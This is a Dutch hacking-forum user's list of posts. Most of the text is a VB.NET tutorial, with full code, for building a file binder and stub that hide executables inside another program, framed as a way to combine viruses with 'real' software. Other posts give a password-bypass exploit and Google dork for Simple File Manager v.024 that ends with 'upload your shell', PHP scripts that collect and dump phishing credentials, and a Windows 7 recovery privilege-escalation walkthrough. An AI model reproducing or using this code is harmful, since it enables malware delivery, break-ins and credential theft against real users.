Toon bijdragen

Deze sectie stelt je in staat om alle bijdragen van dit lid te bekijken. Je kunt alleen de bijdragen zien waar je op dit moment toegang toe hebt.


Topics - RaMp6

Pagina's: [1] 2
1
Forum spelletjes / Web Challenge
« Gepost op: oktober 25, 2015, 02:12:51 pm »
Ik had ooit de domeinnaam 'hacksite.nl' in mijn bezit.

Deze heb ik niet verlengd, maar de hosting bestaat nog wel.
Op deze hosting heb ik een challenge voor jullie gemaakt.

Success :)

Tip 1: https://mawords.com/
Tip 2: Tel the net! Or net the cat?

2
Tutorials / VB.NET File Binder
« Gepost op: oktober 17, 2015, 09:58:40 pm »

Ik heb deze tutorial voor een ander forum geschreven vandaar dat de afbeelding achtergronden niet de goede kleur zijn.
In deze tutorial ga ik jullie uitleggen hoe je een simpele file binder maakt in VB.NET.
Een file binder maakt het mogelijk om meerdere bestanden in 1 te binden; Je hoeft maar 1 programma uit te voeren en alle bestanden of programma's die je gekozen hebt worden tegelijkertijd geopend.

Dit wordt vaak gedaan om bijvoorbeeld virussen te combineren met 'echte' software.

Deze binder kan in principe alle bestandsformaten uitvoeren, maar het 'output' bestand zal altijd een executable (.exe) bestand zijn.

Ik probeer in deze tutorial zo veel mogelijk uit te leggen. Maar als er een functie gebruikt wordt die je niet begrijpt, kan je je muis er een paar seconden op laten staan en krijg je precies te zien wat deze functie doet, welke argumenten hij nodig heeft en wat hij voor waarde returnt.


Ik raad aan om de code over te nemen in Visual Studio (2015 Community Edition) of te lezen op de pastebin links die ik er bij zet.
De code is dan veel leesbaarder, en zie je ook snel wat een comment is.


Als eerst een korte uitleg wat we precies gaan doen.

We gaan 2 programma's maken:

Het binder programma;
Dit is het programmatje wat jij, wanneer je de binder gebruikt uit zal voeren.
Dit programma heeft, in tegenstelling tot de stub, een GUI (Grafische interface)

1. Maakt een nieuwe executable aan op de harddisk.
2. Schrijft daar de stub executable naartoe.
3. Schrijft het totale aantal bestanden in de volgende 4 Bytes. (In een Int32: dit is een getal die 4 Bytes in beslag neemt)
3. Schrijft de grootte in Bytes van het eerste bestand (die je geselecteerd hebt om te binden) in de volgende 4 Bytes (weer een Int32)
4. Schrijft de extensie van het bestand in de volgende 8 Bytes (met ASCII encoding gebruikt elk karakter 1 Byte, we kunnen dus maximaal 8 tekens van de extensie opslaan). Als je wilt kan je dit zo groot maken als je zelf wilt, vergeet dat dan niet in de stub ook aan te passen.
5. Schrijft de binaire data van het bestand.

Stap 3 t/m 5 worden voor elk gekozen bestand herhaalt.

Zo komt de output executable van de binder er uit te zien


Als je nu het 'output.exe' programma uitvoert leest Windows als eerste het stub gedeelte en voert dat uit. De data daarna zal door Windows genegeerd worden.

De stub;
Dit is een programmatje die de 'gebinde' executable uitleest (waar dus alle bestanden die uitgevoerd moeten worden in zitten) en alle bestanden een voor een uitvoert.

In onze simpele binder worden de bestanden eerst opgeslagen in een tijdelijke map en daarna uitgevoerd.

Dit is meer detecteerbaar door virusscans dan wanneer de programma's gelijk vanuit het RAM worden uitgevoerd.

De programma's gelijk vanuit het RAM uitvoeren is iets ingewikkelder, dit kan in .NET met System.Reflection.Assembly.Load()


Als eerste maken we een nieuw project Windows Forms Project.
Noem deze bijvoorbeeld 'File Binder'.

Design
Voeg 2 buttons en 1 ListView toe.
Geef een button de tekst "Select files..." en een "Bind".
Zet de ListView.View op "Details" en voeg 3 kolommen toe, met de tekst:
"Filename", "Size" en "Extension"
Dit doe je door op het kleine pijltje rechtsboven bij de ListView te klikken.


Voeg ook een OpenFileDialog en een SaveFileDialog toe.

Code
Ik heb geprobeerd zo veel mogelijk comments in de code te stoppen zodat je snapt wat er gebeurt.
Comments in Visual Basic worden aangegeven met en enkele quote '

Select Files...

Dubbelklik op de "Select files..." button die je hebt toegevoegd en voeg de volgende code tussen Private Sub (...) en End Sub toe: http://pastebin.com/qw3SvLbc
'
        'Als eerste openen we de OpenFileDialog en kijken we of hij is gesloten met de OK knop.
        If OpenFileDialog1.ShowDialog() = DialogResult.OK Then

            'dan loopen we door elke file
            For Each fileName As String In OpenFileDialog1.FileNames

                'Hier openen we het huidige bestand als een FileStream en noemen hem fs
                Dim fs = File.OpenRead(fileName)

                'dan maken we een Array()genaamd listArr met 3 string items
                Dim listArr(3) As String
                'in het eerste item slaan we de filename op
                listArr(0) = fileName
                'in het tweede de de grootte van het bestand in Bytes
                'daar hebben we dus die FileStream voor nodig
                listArr(1) = fs.Length
                'Dan pakken we de bestandsnaam (inclusief map) en splitsen we de naam bij elke punt
                'Dan nemen we het laatste gedeelte. De bestandsextensie
                'Die slaan we in het 3e item van de Array op
                listArr(2) = fileName.Split(".").Last

                'dan pakken we die array, maken er een ListViewItem van
                'en voegen die toe aan ListView1
                ListView1.Items.Add(New ListViewItem(listArr))

                'Hier sluiten we de FileStream zodat het RAM geheugen niet vol raakt
                fs.Close()
            Next

        End If

Zorg ook dat je hélemaal bovenaan je code, dus nog boven Public Class Form1, het volgende toevoegt:
Imports System.IO 'Dit wordt gebruikt om bestanden te lezen en te schrijven.
Imports System.Text 'Dit wordt gebruikt voor het omzetten van strings naar Byte Array's

Bind!

Dubbelklik op de "Bind" knop en voeg daar deze code toe: http://pastebin.com/z1Yd4g3L
'
        'Eerst openen we de SaveFileDialog
        'en kijken weer of deze is gesloten met de OK knop
        If SaveFileDialog1.ShowDialog = DialogResult.OK Then

            'Dan lezen we de stub als een Byte Array
            'de stub maken we in het volgende deel van deze tutorial
            Dim stub() As Byte = File.ReadAllBytes("stub.exe")

            'newFile is de FileStream van de nieuwe 'gebinde' executable
            'Met FileMode.Create wordt het bestand gelijkt aangemaakt
            Dim newFile As New FileStream(SaveFileDialog1.FileName, FileMode.Create)

            'Schrijf de Bytes van de stub.exe naar het nieuwe bestand
            newFile.Write(stub, 0, stub.Length)
           
            'dan schrijven we hoeveel bestanden we precies gaan binden
            'deze informatie heeft de stub straks nodig
            'onze stub is zo ingesteld dat hij straks deze 4 bytes leest als de totale aantal files
            'Waarom 4 Bytes? omdat een Int32 (Integer) uit 32bits bestaat. 32 bits / 8 = 4 Bytes
            newFile.Write(BitConverter.GetBytes(Convert.ToInt32(ListView1.Items.Count)), 0, 4)

            'Oke, tijd om de bestanden toe te voegen!
            'Loop door elk bestand en noem het 'item'
            For Each item In ListView1.Items

                'Weet je nog dat we de bestandsnaam, grootte en extensie hebben toegevoegd?
                'Die kunnen we nu bereiken met
                'item.SubItems(0).Text = de bestandsnaam
                'item.SubItems(1).Text = de grootte van het bestand in Bytes
                'item.SubItems(2).Text = de bestandsextensie

                'Dan openen we het bestand door weer een FileStream te maken
                'en deze noemen we ook weer 'fs'
                Dim fs = File.OpenRead(item.SubItems(0).Text)

                'Nu maken we een Byte Array (een array met Bytes)
                'en noemen die 'ext' voor de extensie
                'Weet je nog dat we in het begin 'Imports System.Text' hebben gedaan?
                'Dat hebben we nu nodig om de extensie String om te zetten naar een Byte Array.
                Dim ext() As Byte = Encoding.ASCII.GetBytes(item.SubItems(2).Text)

                'ASCII encoding gebruikt 1 Byte voor elk karakter
                'We hebben 8 Bytes gereserveerd voor de extensie
                'Maar wat als de extensie maar 3 karakters (dus 3 Bytes) is?

                'Als we deze Bytes niet opvullen krijgen we een error bij het schrijven
                'We willen namelijk 8 Bytes schrijven en hebben er misschien minder

                'Dus vullen we de Byte array genaamd 'ext' op tot 8 items, met lege items (Null Bytes)
                ReDim Preserve ext(7) '7 = 8 items, want hij begint bij 0

                'Dan kijken we of we het bestand kunnen lezen
                'Weet je nog dat we het bestand geopend hadden met de naam 'fs' ?
                If fs.CanRead Then
                    'We maken een Byte Array met dezelfde hoeveelheid items als het bestand Bytes heeft
                    'We gebruiken nu fs.Length maar we konden net zo goed item.SubItems(1).Text gebruiken
                    'Alleen is dat een String en zouden we dat eerst om moeten zetten naar een Integer
                    'Vandaar dat ik opnieuw de grootte van het bestand uitlees
                    Dim fileBytes(fs.Length - 1) As Byte 'waarom '- 1'? Een array begint bij 0 en 'Length' bij 1
                    'Dan lezen we het bestand en schrijven de inhoud ervan naar de 'fileBytes' array
                    fs.Read(fileBytes, 0, fs.Length)

                    'Nu gaan we weer in de nieuwe 'gebinde' executable schrijven.
                    'Deze FileStream hadden 'newFile' genoemd

                    'Na de stub en de hoeveelheid files, wat we hierboven al geschreven hebben,
                    'schrijven we nu, in de volgende 4 Bytes de grootte van dit bestand die we willen binden
                    'Zoals je bij de uitleg misschien hebt gelezen: een Int32 (Integer) is 4 Bytes
                    newFile.Write(BitConverter.GetBytes(Convert.ToInt32(fs.Length)), 0, 4)
                    'in de volgende 8 bytes schrijven we de extensie
                    'als we 'ext' niet hadden opgevuld en de extensie heeft minder dan 8 tekens
                    'dan zouden we hier een error krijgen
                    newFile.Write(ext, 0,
                    'En als laatst schrijven we de bytes van het bestand zelf naar de nieuwe executable
                    newFile.Write(fileBytes, 0, fs.Length)

                    'En natuurlijk moeten we de FileStream weer sluiten om RAM vrij te maken
                    fs.Close()
                Else 'Als we het bestand niet kunnen lezen:
                    'Verwijder dan het nieuwe bestand wat we tot nu toe geschreven hebben,
                    File.Delete(SaveFileDialog1.FileName)
                    'Sluit weer de FileStream
                    fs.Close()
                    'en geef een error.
                    MsgBox("File cannot be read:" & vbCrLf & item.SubItems(0).Text)
                    'Exit For stopt de 'For' Loop zodat er niet nieuwe bestanden toegevoegd worden wanneer we een error hebben
                    Exit For
                End If
            Next

            'als alle bestanden successvol geschreven zijn, sluit het bestand
            newFile.Close()
            'en laat een berichtje zien dat we klaar zijn!
            MsgBox(ListView1.Items.Count & " files successfully bound.")

        End If


Ga naar File -> Add -> New Project...
Kies voor Windows Console Application
Noem deze bijvoorbeeld "stub"

Zorg dat je Module1.vb open heb staan


Voeg helemaal bovenaan weer deze code toe:
Imports System.IO 'Dit wordt gebruikt om bestanden te lezen en te schrijven.
Imports System.Text 'Dit wordt gebruikt voor het omzetten van strings naar Byte Array's

Zet nu tussen Module Module1 en Sub Main() dit:
'
    'stubLen is de grootte van de stub.exe in Bytes
    'die van mij is 10240, die van jou misschien kleiner
    'de exacte grootte kunnen we pas zien als we de stub compiled hebben
    Public stubLen = 10240
    'De volgende waardes staan voor hoeveel ruimte we voor
    'het totaal aantal bestanden, grootte van t bestand en extensie hebben gereserveerd
    Public fileCountLen = 4 'int32 = 4 Bytes
    Public fileLenLen = 4
    Public fileExtLen = 8

En nu het echte werk tussen Sub Main() en End Sub: http://pastebin.com/4AdUNKt8
'
        'Try zodat het programma niet stopt bij een error
        'Zo kunnen we ook de error naar de console schrijven
        Try
            'System.Reflection.Assembly.GetExecutingAssembly.Location
            'is het volledige pad naar het huidige programma wat wordt uitgevoerd
            'ik hoop dat je onderhand snapt dat thisFile nu een FileStream is
            'zodat we dus DIT bestand zichzelf kunnen laten lezen
            Dim thisFile As New FileStream(System.Reflection.Assembly.GetExecutingAssembly.Location, FileMode.Open, FileAccess.Read)

            'bin wordt een BinaryReader
            'zodat we functies als Seek() kunnen gebruiken
            Dim bin As New BinaryReader(thisFile)

            'Nu hebben we de grootte van de stub (in Bytes) nodig
            'we willen namelijk beginnen met lezen vanaf waar de stub eindigt
            'dit doen we met de Seek() functie

            'Verplaats de reader naar het einde van de stub
            bin.BaseStream.Seek(stubLen, SeekOrigin.Begin)

            'Zoals je je misschien kan herinneren zijn de 4 Bytes na de stub
            'een Int32 integer waar we het totaal aantal gebinde bestanden in hebben geschreven

            'Lees dus de volgende 4 Bytes (fileCountLen = 4)
            'en converteer die 4 Bytes naar een Int32 integer
            Dim fileCount As Integer = BitConverter.ToInt32(bin.ReadBytes(fileCountLen), 0)

            'Nu hebben we dus in fileCount het totaal aantal bestanden staan.
            'En die hebben we hier weer nodig, namelijk om door alle bestanden te loopen
            For i As Integer = 1 To fileCount

                'de BinaryReader (bin) is nu aangekomen bij de plek waar we
                'de grootte van het bestand hebben opgeslagen.
                'Zo weten we straks hoeveel Bytes we moeten lezen
                'Lees dus de volgende 4 Bytes uit en maak daar weer een integer van
                Dim fileLength As Integer = BitConverter.ToInt32(bin.ReadBytes(fileLenLen), 0) 'die noemen we fileLength

                'In de volgende 8 Bytes heeft de binder de bestandsextensie opgeslagen
                'Lees die dus weer uit en maak daar een String van (met ASCII encoding)
                Dim fileExtension As String = Encoding.ASCII.GetString(bin.ReadBytes(fileExtLen))

                'Weet je nog dat we in de binder de extensie hebben opgevuld met lege (Null) Bytes?
                'Die Null Bytes moeten we weer verwijderen, dat doen we met Trim()
                fileExtension.Trim(Chr(0))
                'Elk teken heeft een getal, de Null Byte heeft het getal 0, vandaar Chr(0)
                'Bekijk hier alle tekens: [url]http://www.roubaixinteractive.com/PlayGround/Binary_Conversion/The_Characters.asp[/url]

                'En nu kunnen we eindelijk het bestand uitlezen en opslaan as Byte Array in fileBytes
                Dim fileBytes() As Byte = bin.ReadBytes(fileLength)

                'sla het bestand op en voer het bestand uit!
                saveNrun(fileBytes, fileExtension)
            'ga naar het volgende bestand, totdat we het aantal in "fileCount" (2, 3 of misschien 20 bestanden?) hebben bereikt
            Next

            'sluit de BinaryReader en de FileStream om RAM vrij te maken
            bin.Close()
            thisFile.Close()
        'Als er een fout is opgetreden
        Catch ex As Exception
            'Kan je de volgende regel gebruiken om de foutmelding naar de console te schrijven
            'Console.WriteLine(ex.Message)

            'en sluit daarna weer de BinaryReader en de FileStream om RAM vrij te maken
            bin.Close()
            thisFile.Close()
        End Try

Zo bijna klaar!

Nog 1 functie en we zijn klaar om te compilen.
Namelijk de functie saveNrun(), om het uitgelezen bestand op te slaan en uit te voeren.
Dit kan je ook vervangen met een eigen runFromRAM() functie, gebruikmakend van System.Reflection.Assembly.

Buiten je Sub Main(), dus na End Sub, maar nog wel in de Module, dus vóór End Module maak je de Sub saveNrun():
'
    'Maak een "Sub", een functie zonder return waarde
    'saveNrun() heeft 2 argumenten, fileBytes en fileExtenstion
    Public Sub saveNrun(fileBytes() As Byte, fileExtension As String)
        'tmpFile is een String met een tijdelijke bestandsnaam in de Temp Windows map + de bestandsextensie
        Dim tmpFile = Path.GetTempFileName & "." & fileExtension
        'Sla het bestand in de tijdelijke map op
        File.WriteAllBytes(tmpFile, fileBytes)
        'De volgende regel kan handig zijn voor debugging
        'Console.WriteLine("Starting tmpFile: " & tmpFile)
       
        'En uiteindelijk voeren we het tijdelijke bestand uit en zijn we klaar!
        Process.Start(tmpFile)
    End Sub

Nu compilen we het project door op Build -> Build Solution of CTRL + Shift + B te drukken.
Het enige wat we nu nog moeten doen is checken hoe groot onze stub.exe precies is geworden.

Ga naar je project map (C:\Users\JouwNaam\Documents\Visual Studio 2015\Projects\Binder\stub\bin\Debug)
Rechtsklik op stub.exe en ga naar Properties.

Vervang het getal bij Public stubLen = 10240 met dit aantal bytes en hercompileer je project.

Nu moet je stub.exe in de zelfde map zetten als je binder, anders kan hij hem niet vinden.
Je kan ook zelf proberen de stub.exe met je binder te binden zodat je maar 1 bestand overhoud voor je binder.Als er vragen zijn wil ik je graag helpen, maar probeer wel goed te lezen en alle stappen exact te volgen.

Fout gevonden? Ik hoor het graag.

Einderesultaat

3
Downloads / Flappy Bird (original apk)
« Gepost op: februari 19, 2014, 04:27:42 pm »
Nu flappy bird is verwijderd en ik m nog had. dacht ik laat ik zo aardig zijn om de apk te delen. ik zie in het bestand dat het versie 1.3 is. ik ga er van uit dat dit de nieuwste versie is want ik heb m pas sinds kort voordat hij verwijderd werd uit de play store.

gewoon bestand uitpakken en de apk op je telefoon zetten en het bestand openen. als dit een fout geeft moet je bij je instellingen ergens aanvinken dat je apps van externe bronnen wil installeren of zo iets.

4
Scripttalen / [bash/grep/regex] probleempje
« Gepost op: februari 14, 2014, 05:18:05 pm »
hoi allemaal, wat is t hier rustig zeg. naja ik stel toch me vraag maar ff hier misschien dat iemadn me kan helpen.

ben bezig met n bash scriptje  :papier:

gebruik grep voor de regex

(?<=<tr><td class=[list]|[list2]>www</td><td class=[list]|[list2] align=center>A</td><td class=[list]|[list2] >)(.*?)(?=</td><td class=[list]|[list2] align=center><input type=checkbox name=arecs)

dits mijn regex maar het probleem is hij moet list of list2 hebben. heb ook al met een [icode:v2i2ho5g]list[.?][/icode:v2i2ho5g] geprobeerd maar dan geeft grep een error [icode:v2i2ho5g]grep: lookbehind assertion is not fixed length[/icode:v2i2ho5g]
omdat 'lookbehind' een vaste lengte moet hebben. dus geen ? of *

het probleem is dat ie met me huidige code iets heel anders pakt. hij matcht [icode:v2i2ho5g]list2><input type=text name=name >[/icode:v2i2ho5g] en [icode:v2i2ho5g]list><input type=text name=name >[/icode:v2i2ho5g]  :hmmm:

i hop someone can help me?

5
Server-side / Subcategorien [php]
« Gepost op: januari 16, 2014, 10:23:31 pm »
hoi allemaal, zocht een scriptje om subcategorien en breadcrumb's te maken.
kwam uiteindelijk op dit script uit, zaten wat foutjes in die ik verbeterd heb maar nog niet alles.

<?php
$sql = "
  SELECT
      id
    , parent_id
    , naam
  FROM categorien
WHERE actief=1
  ORDER BY
      parent_id
    , id
";
$result = mysqli_query($con, $sql) or die("mysql error " . mysqli_error($con) . " in query " . $sql);

// load results in a query
$catArray = array();
while ($row = mysqli_fetch_assoc($result)) {
  $catArray[$row['parent_id']][$row['id']] = $row['naam'];
}

// recursive function
function loopTroughArray($parent_id, $catArray) {
  foreach ($catArray[$parent_id] as $id => $naam) {
    echo "cat id: " . $id . " cat name: " . $naam . " - ";
    loopTroughArray($id, $catArray);
  }
}

// call the recursive function with parent_id = 0
loopTroughArray(0, $catArray);
?>

gestolen van deze site: http://www.sitepoint.com/forums/showthr ... ubcategory

Het werkt wel, krijg alleen 2 notes en n warning.

cat id: 1 cat name: Elektronica - cat id: 4 cat name: Accesoires - 
Notice: Undefined offset: 4 in C:UsersRamsesDesktopaffrootcustomcatsubtest.php on line 28

Warning: Invalid argument supplied for foreach() in C:UsersRamsesDesktopaffrootcustomcatsubtest.php on line 28
cat id: 3 cat name: Speelgoed -
Notice: Undefined offset: 3 in C:UsersRamsesDesktopaffrootcustomcatsubtest.php on line 28

Warning: Invalid argument supplied for foreach() in C:UsersRamsesDesktopaffrootcustomcatsubtest.php on line 28

ben niet zo heel goed in PHP, vooral de foreach functie xD
hij geeft waarschijnlijk een Undefined offset note omdat ie een keer te veel door de foreach gaat..

wie kan mij helpen?

6
Client-side / [CSS] Is dit mogelijk?
« Gepost op: november 02, 2013, 10:02:14 am »
Hoi, ik ben met een theme voor prestashop bezig.

Ik wil in een verticaal menu elk sub menu 20px verder laten padden, ik weet dat ik elke keer ul li ul li ul li kan doen voor elk sub menu maar kan het niet sneller? dus bijvoorbeeld voor elke ul li er 20px padding bij komt dus iets als padding+20 ofzo.


greets, hoop dat je weet wat ik bedoel.

misschien is t mogelijk met psuedo classes als :nth-child()

7
Uitdagingen / Wie kan dit?!
« Gepost op: juli 02, 2013, 01:59:55 pm »
Jongens.... ik heb een challenge voor jullie, wie de geheime code kan ontcijferen krijgt karma!veel plezier

8
Nieuws / Windows 7 SP1 lek
« Gepost op: juni 29, 2013, 12:44:29 pm »
Citaat
##############################################################################################
# Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]
# Vendor: Microsoft
# Affected Software: Windows 7 SP1 (and probably other)
# Title: Owning Windows 7 - From Recovery to "nt authoritysystem" - Physical Access Required
# See also: http://intelcomms.blogspot.com/2013/05/ ... to-nt.html
##############################################################################################

Just wanted to share with you the below, which I have already communicated with
Microsoft - according to MSRC team "An attacker with unrestricted physical
access can certainly manipulate a system in multiple ways. This is not
something we consider a security vulnerability." thus no CVE "Computer owners
should provide for physical security of systems as part of best practices.
There is more discussion of physical access in the "10 Immutable Laws
of Security" (http://technet.microsoft.com/en-us/libr ... 78941.aspx)
under Law #3".

The scenario is as follows:

1. Windows 7 SP1, and
2. Workstation with BIOS settings to restrict boot up from CD, and
3. Workstation joined in Windows Active Directory or Standalone

By forcing the machine to boot or shutdown abnormally (eg pressing the
ctl+alt+del during bootup or press the power button (kill) during shutdown)
Windows will enter the "Windows Error Recovery" menu asking us whether we
wish to "Launch startup Repair (recommended)" or "Start Windows Normally"

Select the "Launch Startup Repair (recommended)"

Recovery process will display a "Windows is loading files...." message,
then after a while we enter the "Startup Repair" process (graphical
interface)
A message might appear asking you if you want to "Restore your computer
using System Restore", select Cancel, if it does.
Shortly, a new message box will come up prompting us "Send information
about the problem (recommended)" or "Don't send" and at the bottom of
this dialog box the option with label "View problem details" exist.
Click on "View problem details", you will get information such as
"Problem signature" and more.

Note that at the very bottom of this textarea a link exists which points
to the X drive (X:windowssystem32en-USerofflps.txt)

Clicking on the link; Notepad launches

From there, one can go to File | Open view all contents of the C/D/X/etx
drive (c:documents and settings\* and any other drive available) copy
files to/from different locations/drives, create files, launch cmd.exe,
backdoor Windows etc.

Through ms-dos prompt we noticed we had been granted with
"nt authoritysystem" privileges which makes sense having so, to perform
the recovery operation, but it's too easily for anyone to abuse them
providing he has casual physical access (eg in environments such as
libraries, universities, offices, reception front desks etc; I will
leave your imagination from this point to work:)

As probably others may agree with me, "nt authoritysystem" access should
not be so easy given (or acquired by default, design, whatever, name it),
at a minimum a password prompt or other control should exist to prevent
the ownage.

http://packetstormsecurity.com/files/12 ... omise.html

9
Tutorials / File manager [Google Dork]
« Gepost op: juni 24, 2013, 06:07:53 pm »
Dit is een google dork voor Simple File Manager v.024, waarbij je zonder wachtwoord kan inloggen.

Dork
Ga naar google en zoek naar
"simple file manager .024"

Vervolgens zoek je naar de pagina fm.php, deze is vulnerable bij versie .024 (niet getest op lagere versies)

Het enige wat je nodig hebt is de username, deze is vaak al standaard ingevoerd. anders kan je iets als 'admin' proberen.

De exploit
Ga naar de pagina fm.php en typ daar achter ?u= en dan de gebruikersnaam.
Dus bijvoorbeeld: http://www.exploitable-site.com/fm.php?u=admin
Deze versie van Simple File Manager controleert op deze manier niet op een wachtwoord, als het goed is ben je nu binnen. upload je shell of doe whatever je niet laten kan.


Fix?
Op de site http://onedotoh.sourceforge.net/ staat nog geen nieuwe versie, hoewel ze een nieuwere versie als live demo gebruiken. Dus voor zover ik weet is er nog geen patch gereleased.

10
Scripts / Firefox laten crashen
« Gepost op: juni 23, 2013, 10:09:00 pm »
Plaats dit script op een pagina om de firefox browser van de bezoeker te laten crashen.

Getest op Backtrack 5 R3 (Ubuntu) met Firefox 21.0 (nieuwste versie),
Kali Linux 1.0 (Debian) met Iceweasel v18.0.1
en op Windows XP en 7 met Firefox v21.0

Source: http://packetstormsecurity.com/files/122124/Mozilla-Firefox-21.0-Denial-Of-Service.html


11
Verzoekjes / What happened?
« Gepost op: april 26, 2013, 06:33:19 pm »
Jongens jongens jongens...
wats er gebeurt met dp joh, waarom komen er niet meer tutorials en programmas van de leden?
is er uberhaupt nog wel iemand hier die zich met hacken bezighoud?

Voorstel: waarom maakt niet iemand een Metasploit tutorial ofzo..
Of eentje over ARP Poisoning

best interessante hack onderwerpen vind ik persoonlijk.

greeets :toppie:

12
Software algemeen / Nginx webserver met php5 (debian)
« Gepost op: september 16, 2012, 06:26:42 pm »
hoi allemaal, kzit met n probleemple.

ik had namelijk nog n oude intel dual core, 8gb ram pctje staan en dacht laat ik daar n webserver van maken!
heb PHP5-fpm Nginx en MySQL op Debian squeeze geinstalleerd.

alleen het probleem is dat als ik n php bestand als index gebruik hij de server niet kan vinden, html werkt prima.

denk dat het aan me virtual host file van nginx ligt, iemand ervaring met nginx die me misschien kan helpen?

[attachment=0:30kguje5]notfound.png[/attachment:30kguje5]

greets, rampiee

13
Programmeertalen / Phishing sites gezocht voor programma
« Gepost op: februari 26, 2012, 08:12:50 pm »
Ik heb een simpel programmatje gemaakt met een aantal phishing sites er in.
Heeft iemand er nog een paar die ik mag gebruiken?

ik heb de url + url van de log nodig (het liefst een die checkt of er geen dubbele accounts in komen!)

jullie kunnen mijn script gebruiken
[offtopic:1xo056qt]login.php
Code: php [Selecteer]
    <?php
    $host 
= "localhost";
    $user = "xxx";
    $pass = "xxx";
    $db = "xxx";
    $table = "xxx";

    $conn = mysql_connect($host, $user, $pass) or die(mysql_error());
    mysql_select_db($db) or die(mysql_error());

    $username = addslashes($_GET['usr']);
    $password = addslashes($_GET['pas']);

    $query = mysql_query("SELECT id FROM ". $table ." WHERE username = '". $username ."' AND password = '". $password ."'") or die(mysql_error());
    $num = mysql_num_rows($query);

    if($num == 0) {
    $insert = mysql_query("INSERT INTO ". $table ." VALUES (null, '". $username ."', '". $password ."'") or die(mysql_error());
    }
    ?>

log.php
Code: php [Selecteer]
    <?php
    $host 
= "localhost";
    $user = "xxx";
    $pass = "xxx";
    $db = "xxx";
    $table = "xxx";

    $conn = mysql_connect($host, $user, $pass) or die(mysql_error());
    mysql_select_db($db) or die(mysql_error());

    $query = mysql_query("SELECT * FROM ". $table) or die(mysql_error());
    while($row = mysql_fetch_object($query)) {
    echo $row->username . ":" . $row->password . "rn";
    }
    ?>
[/offtopic:1xo056qt]

[attachment=1:1xo056qt]Untitled.png[/attachment:1xo056qt]

Download v1.0
[attachment=0:1xo056qt]FreeHacks Phish.rar[/attachment:1xo056qt]

14
Verzoekjes / Vraagje, internetcriminaliteit
« Gepost op: november 03, 2010, 03:03:44 pm »
Wat kan iemand van 16 maximaal krijgen voor het hacken van een server?
Ik heb namelijk een mooie brief van de politie :)

15
Server-side / MySQL Error
« Gepost op: oktober 15, 2010, 12:48:24 pm »
Ik ben bezig met dat kassa-systeem maar nou kan ik niet connecten met me database :(

ik heb de volgende sql code gebruikt om de user 'test' toe te voegen en access te geven om vanaf elke host (%) te kunnen connecten.
CREATE USER 'test'@'%' IDENTIFIED BY 'pass';
GRANT ALL PRIVILEGES ON *.* TO 'test'@'%'
    WITH GRANT OPTION;

maar ik krijg nog steeds deze error:
Citaat
Can't connect to MySQL server on '192.168.1.9' (10061)

Pagina's: [1] 2